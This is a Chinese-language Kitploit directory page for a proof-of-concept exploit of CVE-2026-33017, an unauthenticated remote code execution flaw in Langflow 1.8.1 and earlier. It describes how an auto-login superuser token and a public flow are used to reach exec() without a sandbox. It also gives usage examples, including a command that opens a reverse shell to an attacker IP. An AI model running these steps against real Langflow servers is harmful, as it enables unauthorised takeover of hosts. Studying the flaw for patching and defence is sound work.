Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — Langflow 1.8.1 及更早版本中的漏洞允许远程、未经身份验证的攻击者在主机上实现任意命令执行。 | Kitploit
工具/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

Langflow 1.8.1 及更早版本中的漏洞允许远程、未经身份验证的攻击者在主机上实现任意命令执行。

查看仓库
15个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-33017-Langflow-RCE-PoC

Langflow 1.8.1 及更早版本中的漏洞允许远程、未认证的攻击者在主机上实现任意命令执行。

描述

POST /api/v1/build_public_tmp/{flow_id}/flow 端点允许任何人无需认证即可构建公共流程。

通过提供可选的 data 参数,攻击者可以用自己精心构造的定义覆盖存储的流程,并在节点配置中嵌入任意 Python 代码。这些由用户控制的代码通过 exec() 执行,且没有任何沙箱或验证机制,从而导致未认证的远程代码执行。

受影响版本

root@kitploit:~
Langflow 1.8.1 及更早版本

功能特性

  • 当 AUTO_LOGIN=true 时创建公共流程
  • 漏洞利用执行:执行任意命令。
  • 反向 Shell:启动基于 bash 的反向 Shell。

前提条件

  • 目标 Langflow 实例至少有一个公共流程(常见于演示、聊天机器人或共享工作流)
  • 一个公共流程的 UUID(可从共享链接/URL 获取)
  • 无需认证

当 AUTO_LOGIN=true(默认配置)时,未认证的攻击者可以满足所有条件:

  • GET /api/v1/auto_login → 获取超级用户令牌
  • POST /api/v1/flows/ → 创建公共流程
  • 通过 build_public_tmp 触发漏洞利用,无需任何认证
  • 使用方法

    root@kitploit:~
    python cve-2026-33017.py <host> [options]
    

    选项:

    root@kitploit:~
    -p PORT, --port PORT: SSH 端口(默认:7860)
    
    -id FLOW_ID, --flow_id FLOW_ID: 公共流程 ID(如果省略将创建一个新的)
    
    -c COMMAND, --command COMMAND: 要执行的自定义命令
    
    --shell: 启动反向 Shell
    
    --lhost LHOST: 用于反向 Shell 的攻击者 IP
    
    --lport LPORT: 用于反向 Shell 的攻击者端口(默认:4444)
    
    -t TIMEOUT, --timeout TIMEOUT: 连接超时时间(秒)(默认:5)
    

    示例:

    执行命令:

    root@kitploit:~
    python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'
    

    启动反向 Shell:

    root@kitploit:~
    python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
    

    参考

    GitHub 安全公告

    NVD CVE-2026-33017

    Medium

    ⚠️ 免责声明

    此 PoC 仅用于教育和研究目的。使用风险自负。作者对任何滥用或造成的损害不承担责任。

    下载工具